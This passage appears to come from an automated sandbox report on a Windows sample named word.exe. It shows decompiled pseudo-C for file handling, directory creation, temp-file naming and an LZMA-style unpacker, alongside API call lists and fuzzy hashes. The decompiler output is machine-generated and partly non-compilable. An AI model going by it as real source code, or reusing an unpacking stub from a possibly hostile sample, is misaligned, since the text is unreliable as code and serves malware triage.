                                                          				return _t32;
                                                          			}


















                                                          APIs
                                                          • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000020,00000020,?,00402F1D,000000FF,00000000,00000000,?,?), ref: 00402F98
                                                          • ReadFile.KERNELBASE(?,00000004,?,00000000,00000004), ref: 00402FC5
                                                          • ReadFile.KERNELBASE(tCPInfo,00004000,?,00000000,?), ref: 0040301F
                                                          • WriteFile.KERNELBASE(00000000,tCPInfo,?,000000FF,00000000), ref: 00403037
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: File$Read$PointerWrite
                                                          • String ID: tCPInfo
                                                          • API String ID: 2113905535-2120998202
                                                          • Opcode ID: 85f9b32b3f954e73cf89dba4bc253831fee770f0b6474c0430461d584885da6e
                                                          • Instruction ID: 921f3f76ada69b898c24bbee4c45453848788fed2ed6be28b521a649f4e8a62f
                                                          • Opcode Fuzzy Hash: 85f9b32b3f954e73cf89dba4bc253831fee770f0b6474c0430461d584885da6e
                                                          • Instruction Fuzzy Hash: 31313A31901209FBDF21CF65DD44AAE7FBCEB45365F20843BFA04A6194D2349E40DB69
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 551 4015bb-4015ce call 402a85 call 40567b 556 4015d0-4015eb call 405612 CreateDirectoryA 551->556 557 401612-401615 551->557 566 401608-401610 556->566 567 4015ed-4015f8 GetLastError 556->567 558 401635-4021bf call 401423 557->558 559 401617-401630 call 401423 call 405af4 SetCurrentDirectoryA 557->559 572 40291a-402929 558->572 559->572 566->556 566->557 568 401605 567->568 569 4015fa-401603 GetFileAttributesA 567->569 568->566 569->566 569->568
                                                          C-Code - Quality: 85%
                                                          			E004015BB(struct _SECURITY_ATTRIBUTES* __ebx, void* __eflags) {
                                                          				struct _SECURITY_ATTRIBUTES** _t10;
                                                          				int _t19;
                                                          				struct _SECURITY_ATTRIBUTES* _t20;
                                                          				signed char _t22;
                                                          				struct _SECURITY_ATTRIBUTES* _t23;
                                                          				CHAR* _t25;
                                                          				struct _SECURITY_ATTRIBUTES** _t29;
                                                          				void* _t30;
                                                          
                                                          				_t23 = __ebx;
                                                          				_t25 = E00402A85(0xfffffff0);
                                                          				_t10 = E0040567B(_t25);
                                                          				_t27 = _t10;
                                                          				if(_t10 != __ebx) {
                                                          					do {
                                                          						_t29 = E00405612(_t27, 0x5c);
                                                          						 *_t29 = _t23;
                                                          						 *((char*)(_t30 + 0xb)) =  *_t29;
                                                          						_t19 = CreateDirectoryA(_t25, _t23); // executed
                                                          						if(_t19 == 0) {
                                                          							if(GetLastError() != 0xb7) {
                                                          								L4:
                                                          								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
                                                          							} else {
                                                          								_t22 = GetFileAttributesA(_t25); // executed
                                                          								if((_t22 & 0x00000010) == 0) {
                                                          									goto L4;
                                                          								}
                                                          							}
                                                          						}
                                                          						_t20 =  *((intOrPtr*)(_t30 + 0xb));
                                                          						 *_t29 = _t20;
                                                          						_t27 =  &(_t29[0]);
                                                          					} while (_t20 != _t23);
                                                          				}
                                                          				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
                                                          					_push(0xfffffff5);
                                                          					E00401423();
                                                          				} else {
                                                          					E00401423(0xffffffe6);
                                                          					E00405AF4("C:\\Users\\Albus\\AppData\\Local\\Temp", _t25);
                                                          					SetCurrentDirectoryA(_t25); // executed
                                                          				}
                                                          				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t30 - 4));
                                                          				return 0;
                                                          			}











                                                          APIs
                                                            • Part of subcall function 0040567B: CharNextA.USER32(:T@), ref: 00405689
                                                            • Part of subcall function 0040567B: CharNextA.USER32(00000000), ref: 0040568E
                                                            • Part of subcall function 0040567B: CharNextA.USER32(00000000), ref: 0040569D
                                                          • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                          • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                          • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015FB
                                                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 0040162A
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp, xrefs: 0040161F
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                          • String ID: C:\Users\user\AppData\Local\Temp
                                                          • API String ID: 3751793516-2935972921
                                                          • Opcode ID: ac794f138ba7f61467d4ebe51835dd724794318f642f069794646da26921047b
                                                          • Instruction ID: 63bcb5d4f1e8c965e9b2f85ce20a33f9a17abe043d5819b309257051beb803d0
                                                          • Opcode Fuzzy Hash: ac794f138ba7f61467d4ebe51835dd724794318f642f069794646da26921047b
                                                          • Instruction Fuzzy Hash: B9012B31908050ABDB216F755D4497F3774DA55325B28063FF4D2B32E2D63C0D42962E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E004057FA(char _a4, intOrPtr _a6, CHAR* _a8) {
                                                          				signed int _t11;
                                                          				int _t14;
                                                          				signed int _t16;
                                                          				void* _t19;
                                                          				CHAR* _t20;
                                                          
                                                          				_t20 = _a4;
                                                          				_t19 = 0x64;
                                                          				while(1) {
                                                          					_t19 = _t19 - 1;
                                                          					_a4 = 0x61736e;
                                                          					_t11 = GetTickCount();
                                                          					_t16 = 0x1a;
                                                          					_a6 = _a6 + _t11 % _t16;
                                                          					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
                                                          					if(_t14 != 0) {
                                                          						break;
                                                          					}
                                                          					if(_t19 != 0) {
                                                          						continue;
                                                          					}
                                                          					 *_t20 =  *_t20 & 0x00000000;
                                                          					return _t14;
                                                          				}
                                                          				return _t20;
                                                          			}








                                                          APIs
                                                          • GetTickCount.KERNEL32(C:\Users\user\AppData\Roaming\word.exe,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032F8,1033,C:\Users\user\AppData\Local\Temp\), ref: 0040580D
                                                          • GetTempFileNameA.KERNEL32(?,0061736E,00000000,?), ref: 00405827
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\word.exe$nsa
                                                          • API String ID: 1716503409-3536471476
                                                          • Opcode ID: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
                                                          • Instruction ID: 2f33edf353eb26188edb3eebd43b66705c4d1fe0bdf9ced7dfec13a37dcb2b50
                                                          • Opcode Fuzzy Hash: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
                                                          • Instruction Fuzzy Hash: 5BF0A037748248BAE7105E55EC04B9B7F9DDF91760F14C02BFE089A1C0D6B09968CBA9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 98%
                                                          			E00405ED4(void* __ecx) {
                                                          				void* _v8;
                                                          				void* _v12;
                                                          				signed int _v16;
                                                          				unsigned int _v20;
                                                          				signed int _v24;
                                                          				signed int _v28;
                                                          				signed int _v32;
                                                          				signed int _v36;
                                                          				signed int _v40;
                                                          				signed int _v44;
                                                          				signed int _v48;
                                                          				signed int _v52;
                                                          				signed int _v56;
                                                          				signed int _v60;
                                                          				signed int _v64;
                                                          				signed int _v68;
                                                          				signed int _v72;
                                                          				signed int _v76;
                                                          				signed int _v80;
                                                          				signed int _v84;
                                                          				signed int _v88;
                                                          				signed int _v92;
                                                          				signed int _v95;
                                                          				signed int _v96;
                                                          				signed int _v100;
                                                          				signed int _v104;
                                                          				signed int _v108;
                                                          				signed int _v112;
                                                          				signed int _v116;
                                                          				signed int _v120;
                                                          				intOrPtr _v124;
                                                          				signed int _v128;
                                                          				signed int _v132;
                                                          				signed int _v136;
                                                          				void _v140;
                                                          				void* _v148;
                                                          				signed int _t537;
                                                          				signed int _t538;
                                                          				signed int _t572;
                                                          
                                                          				_t572 = 0x22;
                                                          				_v148 = __ecx;
                                                          				memcpy( &_v140, __ecx, _t572 << 2);
                                                          				if(_v52 == 0xffffffff) {
                                                          					return 1;
                                                          				}
                                                          				while(1) {
                                                          					L3:
                                                          					_t537 = _v140;
                                                          					if(_t537 > 0x1c) {
                                                          						break;
                                                          					}
                                                          					switch( *((intOrPtr*)(_t537 * 4 +  &M00406926))) {
                                                          						case 0:
                                                          							__eflags = _v112;
                                                          							if(_v112 == 0) {
                                                          								goto L173;
                                                          							}
                                                          							_v112 = _v112 - 1;
                                                          							_v116 = _v116 + 1;
                                                          							_t537 =  *_v116;
                                                          							__eflags = _t537 - 0xe1;
                                                          							if(_t537 > 0xe1) {
                                                          								goto L174;
                                                          							}
                                                          							_t542 = _t537 & 0x000000ff;
                                                          							_push(0x2d);
                                                          							asm("cdq");
                                                          							_pop(_t576);
                                                          							_push(9);
                                                          							_pop(_t577);
                                                          							_t622 = _t542 / _t576;
                                                          							_t544 = _t542 % _t576 & 0x000000ff;
                                                          							asm("cdq");
                                                          							_t617 = _t544 % _t577 & 0x000000ff;
                                                          							_v64 = _t617;
                                                          							_v32 = (1 << _t622) - 1;
                                                          							_v28 = (1 << _t544 / _t577) - 1;
                                                          							_t625 = (0x300 << _t617 + _t622) + 0x736;
                                                          							__eflags = 0x600 - _v124;
                                                          							if(0x600 == _v124) {
                                                          								L12:
                                                          								__eflags = _t625;
                                                          								if(_t625 == 0) {
                                                          									L14:
                                                          									_v76 = _v76 & 0x00000000;
                                                          									_v68 = _v68 & 0x00000000;
                                                          									goto L17;
                                                          								} else {
                                                          									goto L13;
                                                          								}
                                                          								do {
                                                          									L13:
                                                          									_t625 = _t625 - 1;
                                                          									__eflags = _t625;
                                                          									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                                                          								} while (_t625 != 0);
                                                          								goto L14;
                                                          							}
                                                          							__eflags = _v8;
                                                          							if(_v8 != 0) {
                                                          								GlobalFree(_v8);
                                                          							}
                                                          							_t537 = GlobalAlloc(0x40, 0x600); // executed
                                                          							__eflags = _t537;
                                                          							_v8 = _t537;
                                                          							if(_t537 == 0) {
                                                          								goto L174;
                                                          							} else {
                                                          								_v124 = 0x600;
                                                          								goto L12;
                                                          							}
                                                          						case 1:
                                                          							L15:
                                                          							__eflags = _v112;
                                                          							if(_v112 == 0) {
                                                          								_v140 = 1;
                                                          								goto L173;
                                                          							}
                                                          							_v112 = _v112 - 1;
                                                          							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                                                          							_v116 = _v116 + 1;
                                                          							_t50 =  &_v76;
                                                          							 *_t50 = _v76 + 1;
                                                          							__eflags =  *_t50;
                                                          							L17:
                                                          							__eflags = _v76 - 4;
                                                          							if(_v76 < 4) {
                                                          								goto L15;
                                                          							}
                                                          							_t550 = _v68;
                                                          							__eflags = _t550 - _v120;
                                                          							if(_t550 == _v120) {
                                                          								L22:
                                                          								_v76 = 5;
                                                          								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                                                          								goto L25;
                                                          							}
                                                          							__eflags = _v12;
                                                          							_v120 = _t550;
                                                          							if(_v12 != 0) {
                                                          								GlobalFree(_v12);
                                                          							}
                                                          							_t537 = GlobalAlloc(0x40, _v68); // executed
                                                          							__eflags = _t537;
                                                          							_v12 = _t537;
                                                          							if(_t537 == 0) {
                                                          								goto L174;
                                                          							} else {
                                                          								goto L22;
                                                          							}
                                                          						case 2:
                                                          							L26:
                                                          							_t557 = _v100 & _v32;
                                                          							_v136 = 6;
                                                          							_v80 = _t557;
                                                          							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                                                          							goto L135;
                                                          						case 3:
                                                          							L23:
                                                          							__eflags = _v112;
                                                          							if(_v112 == 0) {
                                                          								_v140 = 3;
                                                          								goto L173;
                                                          							}
                                                          							_v112 = _v112 - 1;
                                                          							_t72 =  &_v116;
                                                          							 *_t72 = _v116 + 1;
                                                          							__eflags =  *_t72;
                                                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                          							L25:
                                                          							_v76 = _v76 - 1;
                                                          							__eflags = _v76;
                                                          							if(_v76 != 0) {
                                                          								goto L23;
                                                          							}
                                                          							goto L26;
                                                          						case 4:
                                                          							L136:
                                                          							_t559 =  *_t626;
                                                          							_t610 = _t559 & 0x0000ffff;
                                                          							_t591 = (_v20 >> 0xb) * _t610;
                                                          							__eflags = _v16 - _t591;
                                                          							if(_v16 >= _t591) {
                                                          								_v20 = _v20 - _t591;
                                                          								_v16 = _v16 - _t591;
                                                          								_v68 = 1;
                                                          								_t560 = _t559 - (_t559 >> 5);
                                                          								__eflags = _t560;
                                                          								 *_t626 = _t560;
                                                          							} else {
                                                          								_v20 = _t591;
                                                          								_v68 = _v68 & 0x00000000;
                                                          								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                                                          							}
                                                          							__eflags = _v20 - 0x1000000;
                                                          							if(_v20 >= 0x1000000) {
                                                          								goto L142;
                                                          							} else {
                                                          								goto L140;
                                                          							}
                                                          						case 5:
                                                          							L140:
                                                          							__eflags = _v112;
                                                          							if(_v112 == 0) {
                                                          								_v140 = 5;
                                                          								goto L173;
                                                          							}
                                                          							_v20 = _v20 << 8;
                                                          							_v112 = _v112 - 1;
                                                          							_t464 =  &_v116;
                                                          							 *_t464 = _v116 + 1;
                                                          							__eflags =  *_t464;
                                                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                          							L142:
                                                          							_t561 = _v136;
                                                          							goto L143;
                                                          						case 6:
                                                          							__edx = 0;
                                                          							__eflags = _v68;
                                                          							if(_v68 != 0) {
                                                          								__eax = _v8;
                                                          								__ecx = _v60;
                                                          								_v56 = 1;
                                                          								_v136 = 7;
                                                          								__esi = _v8 + 0x180 + _v60 * 2;
                                                          								goto L135;
                                                          							}
                                                          							__eax = _v96 & 0x000000ff;
                                                          							__esi = _v100;
                                                          							__cl = 8;
                                                          							__cl = 8 - _v64;
                                                          							__esi = _v100 & _v28;
                                                          							__eax = (_v96 & 0x000000ff) >> 8;
                                                          							__ecx = _v64;
                                                          							__esi = (_v100 & _v28) << 8;
                                                          							__ecx = _v8;
                                                          							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                                                          							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                                                          							__eflags = _v60 - 4;
                                                          							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                          							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                          							if(_v60 >= 4) {
                                                          								__eflags = _v60 - 0xa;
                                                          								if(_v60 >= 0xa) {
                                                          									_t103 =  &_v60;
                                                          									 *_t103 = _v60 - 6;
                                                          									__eflags =  *_t103;
                                                          								} else {
                                                          									_v60 = _v60 - 3;
                                                          								}
                                                          							} else {
                                                          								_v60 = 0;
                                                          							}
                                                          							__eflags = _v56 - __edx;
                                                          							if(_v56 == __edx) {
                                                          								__ebx = 0;
                                                          								__ebx = 1;
                                                          								goto L63;
                                                          							}
                                                          							__eax = _v24;
                                                          							__eax = _v24 - _v48;
                                                          							__eflags = __eax - _v120;
                                                          							if(__eax >= _v120) {
                                                          								__eax = __eax + _v120;
                                                          								__eflags = __eax;
                                                          							}
                                                          							__ecx = _v12;
                                                          							__ebx = 0;
                                                          							__ebx = 1;
                                                          							__al =  *((intOrPtr*)(__eax + __ecx));
                                                          							_v95 =  *((intOrPtr*)(__eax + __ecx));
                                                          							goto L43;
                                                          						case 7:
                                                          							__eflags = _v68 - 1;
                                                          							if(_v68 != 1) {
                                                          								__eax = _v40;
                                                          								_v132 = 0x16;
                                                          								_v36 = _v40;
                                                          								__eax = _v44;
                                                          								_v40 = _v44;
                                                          								__eax = _v48;
                                                          								_v44 = _v48;
                                                          								__eax = 0;
                                                          								__eflags = _v60 - 7;
                                                          								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                          								__al = __al & 0x000000fd;
                                                          								__eax = (__eflags >= 0) - 1 + 0xa;
                                                          								_v60 = (__eflags >= 0) - 1 + 0xa;
                                                          								__eax = _v8;
                                                          								__eax = _v8 + 0x664;
                                                          								__eflags = __eax;
                                                          								_v92 = __eax;
                                                          								goto L71;
                                                          							}
                                                          							__eax = _v8;
                                                          							__ecx = _v60;
                                                          							_v136 = 8;
                                                          							__esi = _v8 + 0x198 + _v60 * 2;
                                                          							goto L135;
                                                          						case 8:
                                                          							__eflags = _v68;
                                                          							if(_v68 != 0) {
                                                          								__eax = _v8;
                                                          								__ecx = _v60;
                                                          								_v136 = 0xa;
                                                          								__esi = _v8 + 0x1b0 + _v60 * 2;
                                                          							} else {
                                                          								__eax = _v60;
                                                          								__ecx = _v8;
                                                          								__eax = _v60 + 0xf;
                                                          								_v136 = 9;
                                                          								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                                                          								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                                                          							}
                                                          							goto L135;
                                                          						case 9:
                                                          							__eflags = _v68;
                                                          							if(_v68 != 0) {
                                                          								goto L92;
                                                          							}
                                                          							__eflags = _v100;
                                                          							if(_v100 == 0) {
                                                          								goto L174;
                                                          							}
                                                          							__eax = 0;
                                                          							__eflags = _v60 - 7;
                                                          							_t264 = _v60 - 7 >= 0;
                                                          							__eflags = _t264;
                                                          							0 | _t264 = _t264 + _t264 + 9;
                                                          							_v60 = _t264 + _t264 + 9;
                                                          							goto L78;
                                                          						case 0xa:
                                                          							__eflags = _v68;
                                                          							if(_v68 != 0) {
                                                          								__eax = _v8;
                                                          								__ecx = _v60;
                                                          								_v136 = 0xb;
                                                          								__esi = _v8 + 0x1c8 + _v60 * 2;
                                                          								goto L135;
                                                          							}
                                                          							__eax = _v44;
                                                          							goto L91;
                                                          						case 0xb:
                                                          							__eflags = _v68;
                                                          							if(_v68 != 0) {
                                                          								__ecx = _v40;
                                                          								__eax = _v36;
                                                          								_v36 = _v40;
                                                          							} else {
                                                          								__eax = _v40;
                                                          							}
                                                          							__ecx = _v44;
                                                          							_v40 = _v44;
                                                          							L91:
                                                          							__ecx = _v48;
                                                          							_v48 = __eax;
                                                          							_v44 = _v48;
                                                          							L92:
                                                          							__eax = _v8;
                                                          							_v132 = 0x15;
                                                          							__eax = _v8 + 0xa68;
                                                          							_v92 = _v8 + 0xa68;
                                                          							goto L71;
                                                          						case 0xc:
                                                          							L102:
                                                          							__eflags = _v112;
                                                          							if(_v112 == 0) {
                                                          								_v140 = 0xc;
                                                          								goto L173;
                                                          							}
                                                          							__ecx = _v116;
                                                          							__eax = _v16;
                                                          							_v20 = _v20 << 8;
                                                          							__ecx =  *_v116 & 0x000000ff;
                                                          							_v112 = _v112 - 1;
                                                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                          							_t340 =  &_v116;
                                                          							 *_t340 = _v116 + 1;
                                                          							__eflags =  *_t340;
                                                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                          							__eax = _v48;
                                                          							goto L104;
                                                          						case 0xd:
                                                          							L39:
                                                          							__eflags = _v112;
                                                          							if(_v112 == 0) {
                                                          								_v140 = 0xd;
                                                          								goto L173;
                                                          							}
                                                          							__ecx = _v116;
                                                          							__eax = _v16;
                                                          							_v20 = _v20 << 8;
                                                          							__ecx =  *_v116 & 0x000000ff;
                                                          							_v112 = _v112 - 1;
                                                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                          							_t127 =  &_v116;
                                                          							 *_t127 = _v116 + 1;
                                                          							__eflags =  *_t127;
                                                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                          							L41:
                                                          							__eax = _v68;
                                                          							__eflags = _v76 - _v68;
                                                          							if(_v76 != _v68) {
                                                          								goto L50;
                                                          							}
                                                          							__eflags = __ebx - 0x100;
                                                          							if(__ebx >= 0x100) {
                                                          								goto L56;
                                                          							}
                                                          							L43:
                                                          							__eax = _v95 & 0x000000ff;
                                                          							_v95 = _v95 << 1;
                                                          							__ecx = _v92;
                                                          							__eax = (_v95 & 0x000000ff) >> 7;
                                                          							_v76 = __eax;
                                                          							__eax = __eax + 1;
                                                          							__eax = __eax << 8;
                                                          							__eax = __eax + __ebx;
                                                          							__esi = _v92 + __eax * 2;
                                                          							_v20 = _v20 >> 0xb;
                                                          							__ax =  *__esi;
                                                          							_v88 = __esi;
                                                          							__edx = __ax & 0x0000ffff;
                                                          							__ecx = (_v20 >> 0xb) * __edx;
                                                          							__eflags = _v16 - __ecx;
                                                          							if(_v16 >= __ecx) {
                                                          								_v20 = _v20 - __ecx;
                                                          								_v16 = _v16 - __ecx;
                                                          								__cx = __ax;
                                                          								_v68 = 1;
                                                          								__cx = __ax >> 5;
                                                          								__eflags = __eax;
                                                          								__ebx = __ebx + __ebx + 1;
                                                          								 *__esi = __ax;
                                                          							} else {
                                                          								_v68 = _v68 & 0x00000000;
                                                          								_v20 = __ecx;
                                                          								0x800 = 0x800 - __edx;
                                                          								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                          								__ebx = __ebx + __ebx;
                                                          								 *__esi = __cx;
                                                          							}
                                                          							__eflags = _v20 - 0x1000000;
                                                          							_v72 = __ebx;
                                                          							if(_v20 >= 0x1000000) {
                                                          								goto L41;
                                                          							} else {
                                                          								goto L39;
                                                          							}
                                                          						case 0xe:
                                                          							L48:
                                                          							__eflags = _v112;
                                                          							if(_v112 == 0) {
                                                          								_v140 = 0xe;
                                                          								goto L173;
                                                          							}
                                                          							__ecx = _v116;
                                                          							__eax = _v16;
                                                          							_v20 = _v20 << 8;
                                                          							__ecx =  *_v116 & 0x000000ff;
                                                          							_v112 = _v112 - 1;
                                                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                          							_t161 =  &_v116;
                                                          							 *_t161 = _v116 + 1;
                                                          							__eflags =  *_t161;
                                                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                          							while(1) {
                                                          								L50:
                                                          								__eflags = __ebx - 0x100;
                                                          								if(__ebx >= 0x100) {
                                                          									break;
                                                          								}
                                                          								__eax = _v92;
                                                          								__edx = __ebx + __ebx;
                                                          								__ecx = _v20;
                                                          								__esi = __edx + __eax;
                                                          								__ecx = _v20 >> 0xb;
                                                          								__ax =  *__esi;
                                                          								_v88 = __esi;
                                                          								__edi = __ax & 0x0000ffff;
                                                          								__ecx = (_v20 >> 0xb) * __edi;
                                                          								__eflags = _v16 - __ecx;
                                                          								if(_v16 >= __ecx) {
                                                          									_v20 = _v20 - __ecx;
                                                          									_v16 = _v16 - __ecx;
                                                          									__cx = __ax;
                                                          									_t175 = __edx + 1; // 0x1
                                                          									__ebx = _t175;
                                                          									__cx = __ax >> 5;
                                                          									__eflags = __eax;
                                                          									 *__esi = __ax;
                                                          								} else {
                                                          									_v20 = __ecx;
                                                          									0x800 = 0x800 - __edi;
                                                          									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          									__ebx = __ebx + __ebx;
                                                          									 *__esi = __cx;
                                                          								}
                                                          								__eflags = _v20 - 0x1000000;
                                                          								_v72 = __ebx;
                                                          								if(_v20 >= 0x1000000) {
                                                          									continue;
                                                          								} else {
                                                          									goto L48;
                                                          								}
                                                          							}
                                                          							L56:
                                                          							_t178 =  &_v56;
                                                          							 *_t178 = _v56 & 0x00000000;
                                                          							__eflags =  *_t178;
                                                          							goto L57;
                                                          						case 0xf:
                                                          							L60:
                                                          							__eflags = _v112;
                                                          							if(_v112 == 0) {
                                                          								_v140 = 0xf;
                                                          								goto L173;
                                                          							}
                                                          							__ecx = _v116;
                                                          							__eax = _v16;
                                                          							_v20 = _v20 << 8;
                                                          							__ecx =  *_v116 & 0x000000ff;
                                                          							_v112 = _v112 - 1;
                                                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                          							_t208 =  &_v116;
                                                          							 *_t208 = _v116 + 1;
                                                          							__eflags =  *_t208;
                                                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                          							L62:
                                                          							__eflags = __ebx - 0x100;
                                                          							if(__ebx >= 0x100) {
                                                          								L57:
                                                          								__al = _v72;
                                                          								_v96 = _v72;
                                                          								goto L58;
                                                          							}
                                                          							L63:
                                                          							__eax = _v92;
                                                          							__edx = __ebx + __ebx;
                                                          							__ecx = _v20;
                                                          							__esi = __edx + __eax;
                                                          							__ecx = _v20 >> 0xb;
                                                          							__ax =  *__esi;
                                                          							_v88 = __esi;
                                                          							__edi = __ax & 0x0000ffff;
                                                          							__ecx = (_v20 >> 0xb) * __edi;
                                                          							__eflags = _v16 - __ecx;
                                                          							if(_v16 >= __ecx) {
                                                          								_v20 = _v20 - __ecx;
                                                          								_v16 = _v16 - __ecx;
                                                          								__cx = __ax;
                                                          								_t222 = __edx + 1; // 0x1
                                                          								__ebx = _t222;
                                                          								__cx = __ax >> 5;
                                                          								__eflags = __eax;
                                                          								 *__esi = __ax;
                                                          							} else {
                                                          								_v20 = __ecx;
                                                          								0x800 = 0x800 - __edi;
                                                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          								__ebx = __ebx + __ebx;
                                                          								 *__esi = __cx;
                                                          							}
                                                          							__eflags = _v20 - 0x1000000;
                                                          							_v72 = __ebx;
                                                          							if(_v20 >= 0x1000000) {
                                                          								goto L62;
                                                          							} else {
                                                          								goto L60;
                                                          							}
                                                          						case 0x10:
                                                          							L112:
                                                          							__eflags = _v112;
                                                          							if(_v112 == 0) {
                                                          								_v140 = 0x10;
                                                          								goto L173;
                                                          							}
                                                          							__ecx = _v116;
                                                          							__eax = _v16;
                                                          							_v20 = _v20 << 8;
                                                          							__ecx =  *_v116 & 0x000000ff;
                                                          							_v112 = _v112 - 1;
                                                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                          							_t371 =  &_v116;
                                                          							 *_t371 = _v116 + 1;
                                                          							__eflags =  *_t371;
                                                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
